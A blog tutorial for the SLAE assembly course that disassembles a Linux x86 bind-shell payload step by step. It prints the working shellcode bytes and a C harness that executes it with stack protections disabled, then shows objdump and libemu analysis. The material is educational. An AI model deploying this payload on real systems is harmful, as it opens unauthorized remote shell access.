part 1: disassembling and understanding shellcode

About a month ago I signed up for the Securitytube Linux Assembly Expert certification to get a deeper understanding of assembly and GDB. Doing so has helped me understand what is actually going on in the registers and not just relying on “hail-mary” advice like “use pop, pop, ret when dealing with SEH.” If you’re interested in Assembly or writing shellcode, I’d highly recommend you take the certification.

My first SLAE assignment was to write my own bind shell. I don’t know C well enough to code straight from memory, and even though I understand how individual assembly instructions affect data in the registers and the stack, I didn’t know how to string these together to create working shellcode. I couldn’t find many tutorials devoted to the subject so I decided to just dive in and build it from scratch.

I’ve created this tutorial to help others who understand basic assembly instructions but who do not know how to string it together to create useful shellcode of their own. Following this post through to the end should bring you up to a level of understanding where you don’t “need” to rely on other peoples scripts to build a bind shell and can start writing your own. My hope is that you will not feel overwhelmed when looking at shellcode and will start to explore, publish and write your own shellcode.

NOTE: If you are already competent at compiling, disassembling or debugging shellcode, skip to Part 2: Building the Shellcode

Lets get started….

WTF is a bind shell?

Before starting this exercise, my understanding of a bind shell was the following: it is a socket that allows you to send commands to a program and receive the responses over a network. This is not very helpful when trying to build your own except that you think you need a socket, port and an executable.

Instead of guessing, lets take a look at some other bind shell shellcode and see what it does.

Metasploit is far from the only way to get your hands on shellcode. There are several sites that host shellcode that you can use for yourself such as Exploit Database from Offensive Security, Project Shellcode from Ty Miller and Shell Storm from Jonathan Salwan.

Lets grab a small bind shell from Shell Storm and see what it does.

First, create a folder to place your working files in.

mkdir bindshell

Go to the following url and take a look at the content. It contains the content of a C file and instructions on how to compile and run it.

http://shell-storm.org/shellcode/files/shellcode-836.php
/*

 Tiny Shell Bind TCP Shellcode - C Language
 Linux/x86

 Written in 2013 by Geyslan G. Bem, Hacking bits

http://hackingbits.com

   geyslan@gmail.com

 This source is licensed under the Creative Commons
 Attribution-ShareAlike 3.0 Brazil License.

 To view a copy of this license, visit

http://creativecommons.org/licenses/by-sa/3.0/

 You are free:

    to Share - to copy, distribute and transmit the work
    to Remix - to adapt the work
    to make commercial use of the work

 Under the following conditions:
   Attribution - You must attribute the work in the manner
                 specified by the author or licensor (but
                 not in any way that suggests that they
                 endorse you or your use of the work).

   Share Alike - If you alter, transform, or build upon
                 this work, you may distribute the
                 resulting work only under the same or
                 similar license to this one.

*/

/*

 tiny_shell_bind_tcp_shellcode

 * 73 bytes
 * null-free if the port is


 # gcc -m32 -fno-stack-protector -z execstack tiny_shell_bind_tcp_shellcode.c -o tiny_shell_bind_tcp_shellcode

 Testing
 # ./tiny_shell_bind_tcp_shellcode
 # nc 127.0.0.1 11111

*/


#include <stdio.h>
#include <string.h>

unsigned char code[] = \

"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
"\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
"\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
"\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
"\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
"\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x41\xcd\x80";

main ()
{

        // When the Port contains null bytes, printf will show a wrong shellcode length.

	printf("Shellcode Length:  %d\n", strlen(code));

	// Pollutes all registers ensuring that the shellcode runs in any circumstance.

	__asm__ ("movl $0xffffffff, %eax\n\t"
		 "movl %eax, %ebx\n\t"
		 "movl %eax, %ecx\n\t"
		 "movl %eax, %edx\n\t"
		 "movl %eax, %esi\n\t"
		 "movl %eax, %edi\n\t"
		 "movl %eax, %ebp\n\t"

	// Setting the port
		 "movw $0x672b, (code+20)\n\t"

	// Calling the shellcode
		 "call code");

}

This may look big and scary now but we’re only interested in seeing what it does so we can figure out how to write our own.

Leave that page open for now, we’ll come back to it shortly.

Create a file in your bindshell folder called shellcode.c

cd bindshell
nano shellcode.c

Paste the following code into the shellcode.c file we just opened.

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"";

main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Now grab just the shellcode from the Shell Storm page and paste it into this new file ensuring the formatting looks like this.

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
"\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
"\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
"\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
"\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
"\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x41\xcd\x80";

main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Save and close the file

CTRL + O   <-- Save File
{ENTER/RETURN KEY}    <-- Accept the Filename
CTRL X   <-- Exit

Great, we’ve just created a C file that will print our shellcode length and then run it. but before we can do that, we need to compile it into a binary file.

To be able to compile this file, we need a compiler such as GCC (GNU Compiler Collection) which will turn our source code into a binary file.

Assuming you’re running this on a Debian based distro such as Ubuntu, Kali Linux, BackTrack or your own distro, you can use Aptitude to install GCC

sudo apt-get install gcc

Because we’re going to compile shellcode often, lets create a script that we can reuse to compile our shellcode.c file.

Create a new file called compile.sh and paste the following into it

#!/bin/bash
if [ -z "$1" ]
	then
		gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
	else
		gcc -m32 -fno-stack-protector -z execstack $1.c -o $1
fi

What this file will do is check to see if you have passed any argument to the script, if not it assumes that the file you want to compile is called “shellcode.c” which in this case is true.

Then the script will run GCC with the following options:

-m32 tells the compiler we're building this source code for a 32 bit operating system
-fno-stack-protection will disable the stack protection mechanisms in GCC
-z execstack will allow our stack to be executable
shellcode.c is the file with the source code
-o shellcode is the binary file we want to create with our source code

Now we need to make this new script executable.

chmod +x compile.sh

That’s it, run the script and you should have a brand new binary that can create bind shells.

./compile.sh

We’re not interested in running this binary right now, we’re only interested in finding out what it does. So lets take a look inside and see what this shellcode is doing.

To do this, we are going to use a tool called “objdump“, part of Gnu Binary Utilities, which will look at our shellcode and show us what it’s doing.

To install these tools run:

sudo apt-get install binutils

Now that we have objdump installed, lets disassemble our binary.

objdump -D shellcode -M intel

Wow, that is a lot of assembly code. The part we’re interested in is:

08049700 <code>:
 8049700:	31 db                	xor    ebx,ebx
 8049702:	f7 e3                	mul    ebx
 8049704:	b0 66                	mov    al,0x66
 8049706:	43                   	inc    ebx
 8049707:	52                   	push   edx
 8049708:	53                   	push   ebx
 8049709:	6a 02                	push   0x2
 804970b:	89 e1                	mov    ecx,esp
 804970d:	cd 80                	int    0x80
 804970f:	5b                   	pop    ebx
 8049710:	5e                   	pop    esi
 8049711:	52                   	push   edx
 8049712:	66 68 2b 67          	pushw  0x672b
 8049716:	6a 10                	push   0x10
 8049718:	51                   	push   ecx
 8049719:	50                   	push   eax
 804971a:	b0 66                	mov    al,0x66
 804971c:	89 e1                	mov    ecx,esp
 804971e:	cd 80                	int    0x80
 8049720:	89 51 04             	mov    DWORD PTR [ecx+0x4],edx
 8049723:	b0 66                	mov    al,0x66
 8049725:	b3 04                	mov    bl,0x4
 8049727:	cd 80                	int    0x80
 8049729:	b0 66                	mov    al,0x66
 804972b:	43                   	inc    ebx
 804972c:	cd 80                	int    0x80
 804972e:	59                   	pop    ecx
 804972f:	93                   	xchg   ebx,eax
 8049730:	6a 3f                	push   0x3f
 8049732:	58                   	pop    eax
 8049733:	cd 80                	int    0x80
 8049735:	49                   	dec    ecx
 8049736:	79 f8                	jns    8049730 <code+0x30>
 8049738:	b0 0b                	mov    al,0xb
 804973a:	68 2f 2f 73 68       	push   0x68732f2f
 804973f:	68 2f 62 69 6e       	push   0x6e69622f
 8049744:	89 e3                	mov    ebx,esp
 8049746:	41                   	inc    ecx
 8049747:	cd 80                	int    0x80
 8049749:	00 00                	add    BYTE PTR [eax],al

We can see xor, push, pop, inc and some other functions but we still don’t really know the steps involved to create our own bind shell.

Lets move onto something that will make this even easier to understand.

Libemu is a x86 Shellcode Emulation tool that can make following and understanding shellcode much easier.

Download and install libemu, following this procedure:

Firstly, we’re going to need Git. If you don’t already have git installed, install it now

sudo apt-get install git

Once you have git installed, clone the libemu repo into your temp folder

cd /tmp
git clone git://git.carnivore.it/libemu.git

You’ll also need some dependencies to get libemu installed and running

sudo apt-get install build-essential autoconf libtool python-dev graphviz

Now go into the libemu folder we cloned

cd /tmp/libemu/

Run these commands to configure and build libemu

autoreconf -v -i
./configure --enable-python-bindings --prefix=/opt/libemu
sudo make install
sudo ldconfig -n /opt/libemu/lib

We should now have a libemu folder installed in /opt/libemu/

We now need to prepare our shellcode for libemu. Start by grabbing just the shellcode and place it in a file called shellcode.hex

cat shellcode.hex
\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a 
\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68 
\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1 
\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd 
\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f 
\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f 
\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3 
\x41\xcd\x80

Next, we’re going to create an alias called hex2raw. Add this line to your .bashrc file if you want this to be permanently available.

alias hex2raw="tr -d '\\\x' | xxd -r -p"

Now lets convert our hex code to raw code.

cat shellcode.hex | hex2raw > shellcode.raw

If all went well, you should have a new file called shellcode.raw

We now have everything we need to see what this bind shell is doing, lets run libemu on this raw code

cat shellcode.raw | /opt/libemu/bin/sctest -vvv -Ss 99999 -G shellcode.dot

The last step is to convert the shellcode.dot graph into an image so we can view it

dot -Tpng -o shellcode.png shellcode.dot

Great, we now have a shellcode.png file, lets take a look at it

EPIC, now we can see what this shellcode is doing a lot clearer and we can also see the system calls that it is making. We will use these to create our own bind shell shellcode.

We can see that the first call being made is the socket call, followed by the bind call, then the listen and accept calls. Then the code loops through the dup2 call several times and finally execve is called.

We finally have our bind shell process:
1. Socket
2. Bind
3. Listen
4. Accept
5. Dup2
6. Execve

In Part 2: Building the Shellcode, we will investigate these calls further and start building our own assembly shellcode.

Keep sploiting

norsec0de

Tagged , , . Bookmark the permalink.

HTML Injection goes here...